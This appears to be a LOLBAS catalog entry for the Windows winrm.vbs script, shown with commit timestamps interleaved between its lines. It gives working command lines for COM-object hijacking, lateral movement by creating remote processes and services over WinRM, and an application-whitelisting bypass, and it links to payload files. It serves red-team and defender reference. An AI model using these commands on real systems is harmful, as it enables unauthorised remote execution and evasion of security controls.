2018-06-09 00:15:06 +02:00
|
|
|
---
|
2018-09-26 11:41:58 +02:00
|
|
|
Name: winrm.vbs
|
|
|
|
Description: Script used for manage Windows RM settings
|
|
|
|
Author: 'Oddvar Moe'
|
2018-06-09 00:15:06 +02:00
|
|
|
Created: '2018-05-25'
|
|
|
|
Commands:
|
|
|
|
- Command: reg.exe import c:\path\to\Slmgr.reg & winrm quickconfig
|
|
|
|
Description: Hijack the Scripting.Dictionary COM Object to execute remote scriptlet (SCT) code.
|
2018-09-26 11:41:58 +02:00
|
|
|
Usecase: Proxy execution
|
|
|
|
Category: Execute
|
|
|
|
Privileges: User
|
|
|
|
MitreID: T1216
|
|
|
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1216
|
|
|
|
OperatingSystem: Windows 10
|
|
|
|
- Command: 'winrm invoke Create wmicimv2/Win32_Process @{CommandLine="notepad.exe"} -r:http://target:5985'
|
|
|
|
Description: Lateral movement/Remote Command Execution via WMI Win32_Process class over the WinRM protocol
|
|
|
|
Usecase: Proxy execution
|
|
|
|
Category: Execute
|
|
|
|
Privileges: User
|
|
|
|
MitreID: T1216
|
|
|
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1216
|
|
|
|
OperatingSystem: Windows 10
|
|
|
|
- Command: 'winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985 \nwinrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985'
|
|
|
|
Description: Lateral movement/Remote Command Execution via WMI Win32_Service class over the WinRM protocol
|
|
|
|
Usecase: Proxy execution
|
|
|
|
Category: Execute
|
|
|
|
Privileges: User
|
|
|
|
MitreID: T1216
|
|
|
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1216
|
|
|
|
OperatingSystem: Windows 10
|
2018-10-25 21:24:55 +02:00
|
|
|
- Command: '%SystemDrive%\BypassDir\cscript //nologo %windir%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty'
|
2018-10-04 16:07:02 +02:00
|
|
|
Description: Bypass AWL solutions by copying and executing cscript.exe and malicious XSL documents from attacker controlled location
|
|
|
|
Usecase: Execute aribtrary, unsigned code via XSL script
|
|
|
|
Category: AWL Bypass
|
|
|
|
Privileges: User
|
|
|
|
MitreID: T1216
|
|
|
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1216
|
|
|
|
OperatingSystem: Windows 10
|
2018-06-09 00:15:06 +02:00
|
|
|
Full Path:
|
2018-09-26 11:41:58 +02:00
|
|
|
- Path: C:\Windows\System32\winrm.vbs
|
|
|
|
- Path: C:\Windows\SysWOW64\winrm.vbs
|
|
|
|
Code Sample:
|
|
|
|
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Slmgr.reg
|
|
|
|
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Slmgr_calc.sct
|
|
|
|
Detection:
|
|
|
|
- IOC:
|
2018-06-09 00:15:06 +02:00
|
|
|
Resources:
|
2018-09-26 11:41:58 +02:00
|
|
|
- Link: https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
|
|
|
|
- Link: https://www.youtube.com/watch?v=3gz1QmiMhss
|
|
|
|
- Link: https://github.com/enigma0x3/windows-operating-system-archaeology
|
|
|
|
- Link: https://redcanary.com/blog/lateral-movement-winrm-wmi/
|
|
|
|
- Link: https://twitter.com/bohops/status/994405551751815170
|
2018-10-04 16:07:02 +02:00
|
|
|
- Link: https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404
|
|
|
|
- Link: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf
|
2018-09-26 11:41:58 +02:00
|
|
|
Acknowledgement:
|
2018-10-04 16:08:21 +02:00
|
|
|
- Person: Matt Graeber
|
|
|
|
Handle: '@mattifestation'
|
2018-09-26 11:41:58 +02:00
|
|
|
- Person: Matt Nelson
|
|
|
|
Handle: '@enigma0x3'
|
|
|
|
- Person: Casey Smith
|
|
|
|
Handle: '@subtee'
|
|
|
|
- Person: Jimmy
|
|
|
|
Handle: '@bohops'
|
|
|
|
- Person: Red Canary Company cc Tony Lambert
|
|
|
|
Handle: '@redcanaryco'
|
2018-10-04 16:07:02 +02:00
|
|
|
---
|